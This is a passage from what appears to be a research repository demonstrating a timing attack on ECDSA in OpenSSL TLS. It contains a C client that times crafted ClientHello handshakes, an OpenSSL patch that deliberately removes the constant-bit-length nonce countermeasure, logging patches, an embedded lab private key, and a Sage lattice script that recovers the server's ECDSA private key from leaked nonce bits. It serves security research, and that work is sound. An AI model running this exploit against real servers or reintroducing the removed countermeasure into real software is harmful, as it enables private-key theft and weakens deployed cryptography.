127 | int jj; 128 | ii = 0; 129 | 130 | // ClientHello.random 131 | fprintf(response_file, "'client_random': '6d70d7a74344e7ccf7c3ace7c77ff39f\ 132 | 9d9b2ea56d26ac9292224aa32f17c10b', "); 133 | 134 | // ServerHello.random 135 | fprintf(response_file, "'server_random': '"); 136 | for(jj = 11; jj < 11 + 32; jj++){ 137 | fprintf(response_file, "%02x", receive_buffer[jj]); 138 | } 139 | fprintf(response_file, "', "); 140 | 141 | // Let's skip the Certificate message 142 | while(node != 3){ 143 | length = (receive_buffer[ii + 3] << 8) + receive_buffer[ii + 4]; 144 | ii += 5 + length; 145 | node++; 146 | } 147 | 148 | // Parse the message and the signature 149 | ii += 9; 150 | length = receive_buffer[ii+3]; 151 | 152 | // ServerKeyExchange.params 153 | fprintf(response_file, "'server_params': '"); 154 | for(jj = ii; jj < ii + 4 + length; jj++){ 155 | fprintf(response_file, "%02x", receive_buffer[jj]); 156 | } 157 | fprintf(response_file, "', "); 158 | 159 | // ServerKeyExchange.Signature 160 | jj = ii + 4 + length + 4; 161 | length = (receive_buffer[jj - 2] << 8) + receive_buffer[jj - 1]; 162 | fprintf(response_file, "'server_signature': '"); 163 | for(ii = jj; ii < jj + length; ii++){ 164 | fprintf(response_file, "%02x", receive_buffer[ii]); 165 | } 166 | fprintf(response_file, "', "); 167 | 168 | // cycles 169 | fprintf(response_file, " 'time': %" PRIu64 " }\n", end_ticks - start_ticks); 170 | 171 | // close file 172 | fclose(response_file); 173 | 174 | // Close socket 175 | close(sockfd); 176 | 177 | return end_ticks - start_ticks; 178 | } 179 | 180 | int main(int argc, char *argv[]) 181 | { 182 | char clienthello[] = "\x16\x03\x01\x01\x2e\x01\x00\x01\ 183 | \x2a\x03\x03\x6d\x70\xd7\xa7\x43\x44\xe7\xcc\xf7\xc3\xac\ 184 | \xe7\xc7\x7f\xf3\x9f\x9d\x9b\x2e\xa5\x6d\x26\xac\x92\x92\ 185 | \x22\x4a\xa3\x2f\x17\xc1\x0b\x00\x00\x94\xc0\x30\xc0\x2c\ 186 | \xc0\x28\xc0\x24\xc0\x14\xc0\x0a\x00\xa3\x00\x9f\x00\x6b\ 187 | \x00\x6a\x00\x39\x00\x38\x00\x88\x00\x87\xc0\x32\xc0\x2e\ 188 | \xc0\x2a\xc0\x26\xc0\x0f\xc0\x05\x00\x9d\x00\x3d\x00\x35\ 189 | \x00\x84\xc0\x2f\xc0\x2b\xc0\x27\xc0\x23\xc0\x13\xc0\x09\ 190 | \x00\xa2\x00\x9e\x00\x67\x00\x40\x00\x33\x00\x32\x00\x9a\ 191 | \x00\x99\x00\x45\x00\x44\xc0\x31\xc0\x2d\xc0\x29\xc0\x25\ 192 | \xc0\x0e\xc0\x04\x00\x9c\x00\x3c\x00\x2f\x00\x96\x00\x41\ 193 | \x00\x07\xc0\x11\xc0\x07\xc0\x0c\xc0\x02\x00\x05\x00\x04\ 194 | \xc0\x12\xc0\x08\x00\x16\x00\x13\xc0\x0d\xc0\x03\x00\x0a\ 195 | \x00\x15\x00\x12\x00\x09\x00\x14\x00\x11\x00\x08\x00\x06\ 196 | \x00\x03\x00\xff\x01\x00\x00\x6d\x00\x0b\x00\x04\x03\x00\ 197 | \x01\x02\x00\x0a\x00\x34\x00\x32\x00\x0e\x00\x0d\x00\x19\ 198 | \x00\x0b\x00\x0c\x00\x18\x00\x09\x00\x0a\x00\x16\x00\x17\ 199 | \x00\x08\x00\x06\x00\x07\x00\x14\x00\x15\x00\x04\x00\x05\ 200 | \x00\x12\x00\x13\x00\x01\x00\x02\x00\x03\x00\x0f\x00\x10\ 201 | \x00\x11\x00\x23\x00\x00\x00\x0d\x00\x20\x00\x1e\x06\x01\ 202 | \x06\x02\x06\x03\x05\x01\x05\x02\x05\x03\x04\x01\x04\x02\ 203 | \x04\x03\x03\x01\x03\x02\x03\x03\x02\x01\x02\x02\x02\x03\ 204 | \x00\x0f\x00\x01\x01"; 205 | 206 | int iteration = atoi(argv[1]); 207 | 208 | uint64_t cycles; 209 | unsigned int ii; 210 | 211 | for(ii = 0; ii < iteration; ii++){ 212 | init(); 213 | printf("#%i\n", ii); 214 | cycles = send_request(ii, "12.12.12.12", 4433, clienthello, 307); 215 | } 216 | 217 | return 0; 218 | } 219 | 220 | -------------------------------------------------------------------------------- /setup/client/offline/README.md: -------------------------------------------------------------------------------- 1 | # The lattice attack 2 | 3 | Now that you have done the attack you should have a set of signatures (r, s) and their relevant truncated digests. You can now mount the attack with `lattice.sage` and the Sage software. 4 | 5 | You should: 6 | 7 | * get rid of the first ~10 responses, they might be rubbish because of server caching or something. 8 | 9 | * take the set of the 60 smallest timings, then take a subset of 43 tuples from it and try the attack. Rinse and repeat. 10 | -------------------------------------------------------------------------------- /setup/client/offline/download.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # get server 4 | scp user@servermachine:/path_to/server.log server.log 5 | 6 | # get client 7 | scp user@clientmachine:/path_to/responses.log client.log 8 | 9 | # remove the first results 10 | echo "$(tail -n +11 server.log)" > server.log 11 | echo "$(tail -n +11 client.log)" > client.log 12 | 13 | # debug 14 | wc -l * 15 | 16 | # stats 17 | # python test_timing_of_client.py 18 | -------------------------------------------------------------------------------- /setup/client/offline/lattice.sage: -------------------------------------------------------------------------------- 1 | import argparse 2 | 3 | ############################################ 4 | # Arguments 5 | ########################################## 6 | 7 | parser = argparse.ArgumentParser() 8 | parser.add_argument("file", help="the files to get the tuples of signatures + truncated hashes from") 9 | parser.add_argument("amount", nargs='?', type=int, default=0, help="number of tuples to use from the file") 10 | parser.add_argument("bits", nargs='?', type=int, default=1, help="number of MSB known") 11 | parser.add_argument("-L", "--LLL", action="store_true") 12 | parser.add_argument("-v", "--verbose", action="store_true") 13 | args = parser.parse_args() 14 | 15 | ############################################ 16 | # Helpers 17 | ########################################## 18 | 19 | def lattice_overview(BB, modulo, trick): 20 | for ii in range(BB.dimensions()[_sage_const_0 ]): 21 | a = ('%02d ' % ii) 22 | for jj in range(BB.dimensions()[_sage_const_1 ]): 23 | if BB[ii,jj] == _sage_const_0 : 24 | a += '0' 25 | elif BB[ii,jj] == modulo: 26 | a += 'q' 27 | elif BB[ii,jj] == trick: 28 | a += 't' 29 | else: 30 | a += 'X' 31 | if BB.dimensions()[_sage_const_0 ] < _sage_const_60 : 32 | a += ' ' 33 | print a 34 | 35 | ############################################ 36 | # Core 37 | ########################################## 38 | 39 | def HowgraveGrahamSmart_ECDSA(digests, signatures, modulo, pubx, trick, reduction): 40 | print "# New attack" 41 | 42 | # Building Equations 43 | # getting rid of the first equation 44 | r0_inv = inverse_mod(signatures[0][0], modulo) 45 | s0 = signatures[0][1] 46 | m0 = digests[0] 47 | 48 | AA = [-1] 49 | BB = [0] 50 | 51 | nn = len(digests) 52 | print "building lattice of size", nn + 1 53 | 54 | for ii in range(1, nn): 55 | mm = digests[ii] 56 | rr = signatures[ii][0] 57 | ss = signatures[ii][1] 58 | ss_inv = inverse_mod(ss, modulo) 59 | 60 | AA_i = Mod(-1 * s0 * r0_inv * rr * ss_inv, modulo) 61 | BB_i = Mod(-1 * mm * ss_inv + m0 * r0_inv * rr * ss_inv, modulo) 62 | AA.append(AA_i.lift()) 63 | BB.append(BB_i.lift()) 64 | 65 | # Embedding Technique (CVP->SVP) 66 | if trick != -1: 67 | lattice = Matrix(ZZ, nn + 1) 68 | else: 69 | lattice = Matrix(ZZ, nn) 70 | 71 | # Fill lattice 72 | for ii in range(nn): 73 | lattice[ii, ii] = modulo 74 | lattice[0, ii] = AA[ii] 75 | 76 | # Add trick 77 | if trick != -1: 78 | print "adding trick:", trick 79 | BB.append(trick) 80 | lattice[nn] = vector(BB) 81 | else: 82 | print "not adding any trick" 83 | 84 | # Display lattice 85 | if args.verbose: 86 | lattice_overview(lattice) 87 | 88 | # BKZ or LLL 89 | if reduction == "LLL": 90 | print "using LLL" 91 | lattice = lattice.LLL() 92 | else: 93 | print "using BKZ" 94 | lattice = lattice.BKZ() 95 | 96 | # If a solution is found, format it 97 | # Note that we only check the first basis vector, we could also check them all 98 | if trick == -1 or Mod(lattice[0,-1], modulo) == trick or Mod(lattice[0,-1], modulo) == Mod(-trick, modulo): 99 | # did we found trick or -trick? 100 | if trick != -1: 101 | # trick 102 | if Mod(lattice[0,-1], modulo) == trick: 103 | solution = -1 * lattice[0] - vector(BB) 104 | # -trick 105 | else: 106 | print "we found a -trick instead of a trick" # this shouldn't change anything 107 | solution = lattice[0] + vector(BB) 108 | # if not using a trick, the problem is we don't know how the vector is constructed 109 | else: 110 | solution = -1 * lattice[0] - vector(BB) # so we choose this one, randomly :| 111 | #solution = lattice[0] + vector(BB) 112 | 113 | # get rid of (..., trick) if we used the trick 114 | if trick != -1: 115 | vec = list(solution) 116 | vec.pop() 117 | solution = vector(vec) 118 | 119 | # get d 120 | rr = signatures[0][0] 121 | ss = signatures[0][1] 122 | mm = digests[0] 123 | nonce = solution[0] 124 | 125 | key = Mod((ss * nonce - mm) * inverse_mod(rr, modulo), modulo) 126 | 127 | return True, key 128 | else: 129 | return False, 0 130 | 131 | ############################################ 132 | # Our Attack 133 | ########################################## 134 | 135 | # get public key x coordinate 136 | pubx = 0x04f3e6ddffc4ba45282f3fabe0e8a220b98980387a 137 | 138 | # we have the private key for verifying our tests 139 | priv = 0x0099ad4abb9a955085709d1dede97aedf230ec0ec9 140 | 141 | # and public key modulo taken from NIST or FIPS (http://csrc.nist.gov/publications/fips/fips186-3/fips_186-3.pdf) 142 | modulo = 5846006549323611672814742442876390689256843201587 143 | 144 | # trick 145 | trick = int(modulo / 2^(args.bits + 1)) # using trick made for MSB known = args.bits 146 | 147 | # LLL or BKZ? 148 | if args.LLL: 149 | reduction = "LLL" 150 | else: 151 | reduction = "BKZ" 152 | 153 | # Get a certain amount of data 154 | with open(args.file, "r") as f: 155 | tuples = f.readlines() 156 | 157 | if args.amount == 0: 158 | nn = len(tuples) 159 | elif args.amount <= len(tuples): 160 | nn = args.amount 161 | else: 162 | print "can't use that many tuples, using max number of tuples available" 163 | nn = len(tuples) 164 | 165 | print "building", nn, "equations" 166 | 167 | # Parse the data 168 | digests = [] 169 | signatures = [] 170 | 171 | for tuple in tuples[:args.amount]: 172 | obj = eval(tuple) # {'s': long, 'r': long, 'm': long} 173 | digests.append(obj['m']) 174 | signatures.append((obj['r'], obj['s'])) 175 | 176 | # Attack 177 | for tt in [trick]:#, 1, -1]: 178 | status, key = HowgraveGrahamSmart_ECDSA(digests, signatures, modulo, pubx, tt, reduction) 179 | if status: 180 | if tt != -1: 181 | print "found key with trick", trick 182 | else: 183 | print "since we are not using any trick, might not be the solution" 184 | print "key:", key 185 | if key == priv: 186 | print "the key is correct!" 187 | else: 188 | print "key is incorrect" 189 | else: 190 | print "found nothing" 191 | 192 | print "\n" 193 | -------------------------------------------------------------------------------- /setup/client/run_client.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | rm responses.log 2> /dev/null 3 | sudo taskset -c 1 nice -n20 ./openssl "$1" # CPU priority (20) and affinity (1) 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /setup/server/README.md: -------------------------------------------------------------------------------- 1 | You can use the `server.key` and `server.pem` as private key and certificate for the victim's server 2 | 3 | You can apply patches to make the server vulnerable AND store useful data 4 | 5 | You can use the utility `run_server.sh path_to_openssl/apps/openssl` to run the server with all the options (modify this file with your own openssl folder) 6 | 7 | You can also use `python create_object.py > server.log` to create a list of tuples to use for verification, stats, etc... 8 | -------------------------------------------------------------------------------- /setup/server/create_objects.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # open all files 4 | with open('nonces.log') as f: 5 | nonces = f.readlines() 6 | with open('signatures.log') as f: 7 | signatures = f.readlines() 8 | with open('truncated_digests.log') as f: 9 | digests = f.readlines() 10 | 11 | # iterate 12 | for ii in range(len(nonces)): 13 | signature = eval(signatures[ii]) # dictionnary stringified {'r': ..., 's': ...} 14 | rr = int(signature["r"], 16) 15 | ss = int(signature["s"], 16) 16 | digest = int(digests[ii], 16) # hexstring 17 | nonce = int(nonces[ii]) # int 18 | 19 | # print 20 | data = { "r": rr, "s": ss, "m": digest, "k": nonce } 21 | print str(data) 22 | -------------------------------------------------------------------------------- /setup/server/openssl_patch/#unpatch.patch#: -------------------------------------------------------------------------------- 1 | --- enssl_clean/crypto/ecdsa/ecs_ossl.c 2014-10-15 07:53:39.000000000 -0500 2 | +++ ecs_ossl.c 2015-08-11 13:37:19.634110128 -0500 3 | @@ -147,11 +147,11 @@ 4 | /* We do not want timing information to leak the length of k, 5 | * so we compute G*k using an equivalent scalar of fixed 6 | * bit-length. */ 7 | - 8 | + /* 9 | if (!BN_add(k, k, order)) goto err; 10 | if (BN_num_bits(k) <= BN_num_bits(order)) 11 | if (!BN_add(k, k, order)) goto err; 12 | - 13 | + */ 14 | /* compute r the x-coordinate of generator * k */ 15 | if (!EC_POINT_mul(group, tmp_point, k, NULL, NULL, ctx)) 16 | { 17 | -------------------------------------------------------------------------------- /setup/server/openssl_patch/README.md: -------------------------------------------------------------------------------- 1 | # Get OpenSSL 2 | 3 | For this we use OpenSSL 1.0.1j although a more recent version might work: 4 | 5 | ``` 6 | wget ftp://ftp.openssl.org/source/old/1.0.1/openssl-1.0.1j.tar.gz 7 | tar xvfz openssl-1.0.1j.tar.gz 8 | cd openssl-1.0.1j && ./config && make 9 | ``` 10 | 11 | # Patch OpenSSL 12 | 13 | All the patch are here, to use them go in the relevant folder and do: 14 | 15 | ``` 16 | patch ecs_oss.c < unpatch.patch 17 | ``` 18 | 19 | Although you might want to do it by hand because I might have fucked the `diff` 20 | 21 | ## Unpatch OpenSSL 22 | 23 | Check `unpatch.patch`, this is a [to revert this patch](https://git.openssl.org/?p=openssl.git;a=blobdiff;f=CHANGES;h=1633d27975c91f122c4e9266b2c3cf4e56e8ffbf;hp=22749650b701d91cc43af24a226369116c2a46f8;hb=992bdde62d2eea57bb85935a0c1a0ef0ca59b3da;hpb=bbcf3a9b300bc8109bb306a53f6f3445ba02e8e9) for OpenSSL.1.0.1j, although it might work on older version since it is so simple. 24 | 25 | go to `openssl/crypto/ecdsa/` and run the patch. 26 | 27 | ## Store signatures 28 | 29 | You can apply `store_signatures.patch`, this will save signatures in `signatures.log` 30 | 31 | go to `openssl/crypto/ecdsa/` and run the patch. 32 | 33 | ## Store nonces 34 | 35 | By applying the patch `store_nonces.patch` you will save the nonces generated every time the server is queried 36 | 37 | it saves to `nonces.log` 38 | 39 | ## Store digests 40 | 41 | apply `store_truncated_digests.patch` and get the truncated digests there: `truncated_digests.log` 42 | 43 | 44 | 45 | -------------------------------------------------------------------------------- /setup/server/openssl_patch/README.md~: -------------------------------------------------------------------------------- 1 | This is a patch for OpenSSL.1.0.1j 2 | although it might work on other version since it is so simple 3 | -------------------------------------------------------------------------------- /setup/server/openssl_patch/store_nonces.patch: -------------------------------------------------------------------------------- 1 | --- openssl_clean/crypto/ecdsa/ecs_ossl.c 2014-10-15 07:53:39.000000000 -0500 2 | +++ openssl_modified/crypto/ecdsa/ecs_ossl.c 2015-08-11 15:43:44.429782271 -0500 3 | @@ -147,10 +147,15 @@ 4 | /* We do not want timing information to leak the length of k, 5 | * so we compute G*k using an equivalent scalar of fixed 6 | * bit-length. */ 7 | - 8 | if (!BN_add(k, k, order)) goto err; 9 | if (BN_num_bits(k) <= BN_num_bits(order)) 10 | if (!BN_add(k, k, order)) goto err; 11 | + 12 | + char* kk = BN_bn2dec(k); 13 | + FILE* nonce_file = fopen("nonces.log", "a"); 14 | + fprintf(nonce_file, "%s\n", kk); 15 | + fclose(nonce_file); 16 | + OPENSSL_free(kk); 17 | 18 | /* compute r the x-coordinate of generator * k */ 19 | if (!EC_POINT_mul(group, tmp_point, k, NULL, NULL, ctx)) 20 | -------------------------------------------------------------------------------- /setup/server/openssl_patch/store_signatures.patch: -------------------------------------------------------------------------------- 1 | --- openssl_clean/crypto/ecdsa/ecs_sign.c 2014-08-06 17:12:03.000000000 -0500 2 | +++ openssl_modified/crypto/ecdsa/ecs_sign.c 2015-08-11 15:38:18.241796371 -0500 3 | @@ -86,12 +86,22 @@ 4 | ECDSA_SIG *s; 5 | RAND_seed(dgst, dlen); 6 | s = ECDSA_do_sign_ex(dgst, dlen, kinv, r, eckey); 7 | if (s == NULL) 8 | { 9 | *siglen=0; 10 | return 0; 11 | } 12 | *siglen = i2d_ECDSA_SIG(s, &sig); 13 | + 14 | + /* store signature object */ 15 | + FILE* signature_file = fopen("signatures.log", "a"); 16 | + char* rr = BN_bn2hex(s->r); 17 | + char* ss = BN_bn2hex(s->s); 18 | + fprintf(signature_file, "{ 'r': '%s', 's': '%s' }\n", rr, ss); 19 | + OPENSSL_free(rr); 20 | + OPENSSL_free(ss); 21 | + fclose(signature_file); 22 | + 23 | ECDSA_SIG_free(s); 24 | return 1; 25 | } 26 | -------------------------------------------------------------------------------- /setup/server/openssl_patch/store_truncated_digests.patch: -------------------------------------------------------------------------------- 1 | --- openssl_clean/crypto/ecdsa/ecs_ossl.c 2014-10-15 07:53:39.000000000 -0500 2 | +++ openssl_modified/crypto/ecdsa/ecs_ossl.c 2015-08-12 13:42:18.794362518 -0500 3 | @@ -278,6 +285,14 @@ 4 | ECDSAerr(ECDSA_F_ECDSA_DO_SIGN, ERR_R_BN_LIB); 5 | goto err; 6 | } 7 | + 8 | + /* store truncated digests */ 9 | + FILE* digest_file = fopen("truncated_digests.log", "a"); 10 | + char* digest_temp = BN_bn2dec(m); 11 | + fprintf(digest_file, "%s\n", digest_temp); 12 | + OPENSSL_free(digest_temp); 13 | + fclose(digest_file); 14 | + 15 | do 16 | { 17 | if (in_kinv == NULL || in_r == NULL) 18 | 19 | -------------------------------------------------------------------------------- /setup/server/openssl_patch/unpatch.patch: -------------------------------------------------------------------------------- 1 | --- ../../../openssl_clean/crypto/ecdsa/ecs_ossl.c 2014-10-15 07:53:39.000000000 -0500 2 | +++ ecs_ossl.c 2015-08-11 13:37:19.634110128 -0500 3 | @@ -147,11 +147,11 @@ 4 | /* We do not want timing information to leak the length of k, 5 | * so we compute G*k using an equivalent scalar of fixed 6 | * bit-length. */ 7 | - 8 | + /* 9 | if (!BN_add(k, k, order)) goto err; 10 | if (BN_num_bits(k) <= BN_num_bits(order)) 11 | if (!BN_add(k, k, order)) goto err; 12 | - 13 | + */ 14 | /* compute r the x-coordinate of generator * k */ 15 | if (!EC_POINT_mul(group, tmp_point, k, NULL, NULL, ctx)) 16 | { 17 | -------------------------------------------------------------------------------- /setup/server/run_server.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | rm nonces.log 2> /dev/null 3 | rm signatures.log 2> /dev/null 4 | rm digests.log 2> /dev/null 5 | "$1" s_server -cert server.pem -key server.key -cipher "ECDHE-ECDSA-AES128-SHA256" -serverpref -quiet 2> /dev/null 6 | -------------------------------------------------------------------------------- /setup/server/server.key: -------------------------------------------------------------------------------- 1 | -----BEGIN EC PARAMETERS----- 2 | BgUrgQQADw== 3 | -----END EC PARAMETERS----- 4 | -----BEGIN EC PRIVATE KEY----- 5 | MFICAQEEFJmtSrualVCFcJ0d7el67fIw7A7JoAcGBSuBBAAPoS4DLAAEBPPm3f/E 6 | ukUoLz+r4OiiILmJgDh6BdZ4az+9jqect5kc13mFFbvMR85U 7 | -----END EC PRIVATE KEY----- 8 | -------------------------------------------------------------------------------- /setup/server/server.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICpzCCAmSgAwIBAgIJAJbZvRNtLVPmMAoGCCqGSM49BAMCMIHHMQswCQYDVQQG 3 | EwJVUzEcMBoGA1UECAwTZXhhbXBsZUBleGFtcGxlLmNvbTEcMBoGA1UEBwwTZXhh 4 | bXBsZUBleGFtcGxlLmNvbTEcMBoGA1UECgwTZXhhbXBsZUBleGFtcGxlLmNvbTEc 5 | MBoGA1UECwwTZXhhbXBsZUBleGFtcGxlLmNvbTEcMBoGA1UEAwwTZXhhbXBsZUBl 6 | eGFtcGxlLmNvbTEiMCAGCSqGSIb3DQEJARYTZXhhbXBsZUBleGFtcGxlLmNvbTAe 7 | Fw0xNTA1MDUyMTAxMTZaFw0xNjA1MDQyMTAxMTZaMIHHMQswCQYDVQQGEwJVUzEc 8 | MBoGA1UECAwTZXhhbXBsZUBleGFtcGxlLmNvbTEcMBoGA1UEBwwTZXhhbXBsZUBl 9 | eGFtcGxlLmNvbTEcMBoGA1UECgwTZXhhbXBsZUBleGFtcGxlLmNvbTEcMBoGA1UE 10 | CwwTZXhhbXBsZUBleGFtcGxlLmNvbTEcMBoGA1UEAwwTZXhhbXBsZUBleGFtcGxl 11 | LmNvbTEiMCAGCSqGSIb3DQEJARYTZXhhbXBsZUBleGFtcGxlLmNvbTBAMBAGByqG 12 | SM49AgEGBSuBBAAPAywABATz5t3/xLpFKC8/q+DooiC5iYA4egXWeGs/vY6nnLeZ 13 | HNd5hRW7zEfOVKNQME4wHQYDVR0OBBYEFDW2F9wGQhnFIxMONSavgQzixJG2MB8G 14 | A1UdIwQYMBaAFDW2F9wGQhnFIxMONSavgQzixJG2MAwGA1UdEwQFMAMBAf8wCgYI 15 | KoZIzj0EAwIDMQAwLgIVA/ZqpNTi5YAwvGVa2jJeq7eL/faIAhUB+vojWffBI9V1 16 | fKZJC9NWhZU0ggI= 17 | -----END CERTIFICATE----- 18 | -------------------------------------------------------------------------------- /slides.key: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mimoo/SSL-TLS-ECDSA-timing-attack/2663b8dd419de0505f791fe04292849b3b80eae8/slides.key -------------------------------------------------------------------------------- /slides.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mimoo/SSL-TLS-ECDSA-timing-attack/2663b8dd419de0505f791fe04292849b3b80eae8/slides.pdf -------------------------------------------------------------------------------- /tools/README.md: -------------------------------------------------------------------------------- 1 | # Test nonces quality 2 | 3 | apply `test_nonces_quality.py` on the `nonces.log` logged by the server to get statistics on the length of the nonces generated 4 | 5 | # Create objects 6 | 7 | use `create_objects.py` in the folder with `nonces.log`, `truncated_digests.log` and `signatures.log` to create a long list of data to use in the lattice attack 8 | -------------------------------------------------------------------------------- /tools/create_objects.py: -------------------------------------------------------------------------------- 1 | # open all files 2 | with open('nonces.log') as f: 3 | nonces = f.readlines() 4 | with open('signatures.log') as f: 5 | signatures = f.readlines() 6 | with open('truncated_digests.log') as f: 7 | digests = f.readlines() 8 | 9 | # create our object 10 | data = [] 11 | 12 | # iterate 13 | for ii in range(len(nonces)): 14 | signature = eval(signatures[ii]) # dictionnary stringified {'r': ..., 's': ...} 15 | rr = int(signature["r"], 16) 16 | ss = int(signature["s"], 16) 17 | digest = digests[ii] # hexstring 18 | nonce = int(nonces[ii]) # int 19 | 20 | # 21 | data.append({"r": rr, "s": ss, "m": digest, "k": nonce}) 22 | 23 | print str(data) 24 | -------------------------------------------------------------------------------- /tools/get_data_by_bitlength.py: -------------------------------------------------------------------------------- 1 | """ outputs an object 2 | { 3 | {signature: "ewrwe", hash: "fewop", etc... } 4 | ... 5 | } 6 | """ 7 | -------------------------------------------------------------------------------- /tools/get_data_by_timing.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mimoo/SSL-TLS-ECDSA-timing-attack/2663b8dd419de0505f791fe04292849b3b80eae8/tools/get_data_by_timing.py -------------------------------------------------------------------------------- /tools/get_small_nonces_data.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | 3 | # check arguments 4 | parser = argparse.ArgumentParser() 5 | parser.add_argument("size", help="the size of the nonces related to the signatures/hashes you will receive") 6 | parser.add_argument("amount", help="the amount of tuples you want") 7 | parser.add_argument("-u", "--upperbound", action="store_true") 8 | args = parser.parse_args() 9 | 10 | # open files 11 | with open('server.log') as f: 12 | servers = f.readlines() 13 | 14 | # parse 15 | total = 0 16 | for server in servers: 17 | server = eval(server) 18 | """ 19 | server = {'s': 4258690496956394045859710327486628073107983527180L, 'r': 5596267126179850251055206297425178818572863924398L, 'm': 306686801322590080711639249229159028718448815200507L, 'k': 1723561017441024778458494094126805326882747377778L} 20 | """ 21 | # is size of nonce good? 22 | size_nonce = len(bin(server['k'])) - 2 23 | if size_nonce == int(args.size) or (size_nonce < int(args.size) and args.upperbound): 24 | obj = {'r': server['r'], 's': server['s'], 'm': server['m']} 25 | print str(obj) 26 | total += 1 27 | if total >= int(args.amount): 28 | break 29 | 30 | -------------------------------------------------------------------------------- /tools/test_nonces_quality.py: -------------------------------------------------------------------------------- 1 | with open('nonces.log') as f: 2 | nonces = f.readlines() 3 | 4 | max_len = 163 # very rare 5 | 6 | lengths = {} 7 | total = 0 8 | 9 | for nonce in nonces: 10 | total += 1 11 | bin_nonce = bin(int(nonce))[2:] 12 | nonce_len = len(bin_nonce) 13 | if nonce_len in lengths: 14 | lengths[nonce_len] += 1 15 | else: 16 | lengths[nonce_len] = 1 17 | 18 | keylist = lengths.keys() 19 | keylist.sort() 20 | 21 | print "%s\t/%s\t%s" % ("length", total, "percentage") 22 | 23 | for length in keylist: 24 | amount = lengths[length] 25 | percentage = int(amount * 100 / total) 26 | print "%s\t%s\t%i" % (length, amount, percentage) 27 | -------------------------------------------------------------------------------- /tools/test_timing_of_client.py: -------------------------------------------------------------------------------- 1 | # open files 2 | with open('client.log') as f: 3 | clients = f.readlines() 4 | 5 | with open('server.log') as f: 6 | servers = f.readlines() 7 | 8 | # 9 | time_sorted = [] 10 | datas = [] 11 | 12 | # parse 13 | for ii in range(len(clients)): 14 | client = eval(clients[ii]) 15 | server = eval(servers[ii]) 16 | 17 | """ 18 | client = {'client_random': '6d70d7a74344e7ccf7c3ace7c77ff39f9d9b2ea56d26ac9292224aa32f17c10b', 'server_signature': '302e021503d4414c054acf852ef69619094f424cb9bd6fe8ae021502e9f64958ae97c7bf9c15d96d6c2d24b5628d6d0c', 'server_params': '0300174104c1910e8aec8c9db07ebb49430f7ace6d1f5bd6b8f267a294b6ea8e797ae60dad9a21af631756098e4e60c0aaf5f31869fe91265ea6341905f90dc78ee1ed911a', 'server_random': '07991aeb30108f2ced273874ab8b0d8f7d17e5aff173efe614f207b779dabcb3', 'time': 3722992} 19 | server = {'s': 4258690496956394045859710327486628073107983527180L, 'r': 5596267126179850251055206297425178818572863924398L, 'm': 306686801322590080711639249229159028718448815200507L, 'k': 1723561017441024778458494094126805326882747377778L} 20 | """ 21 | # create global object 22 | datas.append(dict(client.items() + server.items())) 23 | 24 | # sort by time 25 | time_sorted.append(client['time']) 26 | 27 | time_sorted.sort() 28 | 29 | # sort the list by time 30 | nonces_sorted_by_time = sorted(datas, key=lambda k: k['time']) 31 | 32 | # helper to give stats on a set of nonces 33 | def stats_nonces(nonces): 34 | lengths = {} 35 | total = 0 36 | 37 | for nonce in nonces: 38 | nonce = nonce['k'] 39 | total += 1 40 | bin_nonce = bin(int(nonce))[2:] 41 | nonce_len = len(bin_nonce) 42 | if nonce_len in lengths: 43 | lengths[nonce_len] += 1 44 | else: 45 | lengths[nonce_len] = 1 46 | 47 | keylist = lengths.keys() 48 | keylist.sort() 49 | 50 | print "%s\t/%s\t%s" % ("length", total, "percentage") 51 | 52 | for length in keylist: 53 | amount = lengths[length] 54 | percentage = int(amount * 100 / total) 55 | print "%s\t%s\t%i" % (length, amount, percentage) 56 | 57 | # stats by time 58 | print "stats on first 50 nonces" 59 | stats_nonces(nonces_sorted_by_time[:50]) 60 | 61 | print "stats on first 100 nonces" 62 | stats_nonces(nonces_sorted_by_time[:100]) 63 | 64 | print "stats on first 500 nonces" 65 | stats_nonces(nonces_sorted_by_time[:500]) 66 | -------------------------------------------------------------------------------- /whitepaper.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mimoo/SSL-TLS-ECDSA-timing-attack/2663b8dd419de0505f791fe04292849b3b80eae8/whitepaper.pdf -------------------------------------------------------------------------------- /whitepaper/ecdsa_rfc4492.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mimoo/SSL-TLS-ECDSA-timing-attack/2663b8dd419de0505f791fe04292849b3b80eae8/whitepaper/ecdsa_rfc4492.png -------------------------------------------------------------------------------- /whitepaper/fail.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mimoo/SSL-TLS-ECDSA-timing-attack/2663b8dd419de0505f791fe04292849b3b80eae8/whitepaper/fail.png -------------------------------------------------------------------------------- /whitepaper/nice_web_plot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mimoo/SSL-TLS-ECDSA-timing-attack/2663b8dd419de0505f791fe04292849b3b80eae8/whitepaper/nice_web_plot.png -------------------------------------------------------------------------------- /whitepaper/ps3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mimoo/SSL-TLS-ECDSA-timing-attack/2663b8dd419de0505f791fe04292849b3b80eae8/whitepaper/ps3.png -------------------------------------------------------------------------------- /whitepaper/rfc5246.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mimoo/SSL-TLS-ECDSA-timing-attack/2663b8dd419de0505f791fe04292849b3b80eae8/whitepaper/rfc5246.png -------------------------------------------------------------------------------- /whitepaper/serverKeyExchange.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mimoo/SSL-TLS-ECDSA-timing-attack/2663b8dd419de0505f791fe04292849b3b80eae8/whitepaper/serverKeyExchange.png -------------------------------------------------------------------------------- /whitepaper/serverside.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mimoo/SSL-TLS-ECDSA-timing-attack/2663b8dd419de0505f791fe04292849b3b80eae8/whitepaper/serverside.png -------------------------------------------------------------------------------- /whitepaper/serverside_scrambled.png: -------------------------------------------------------------------------------- 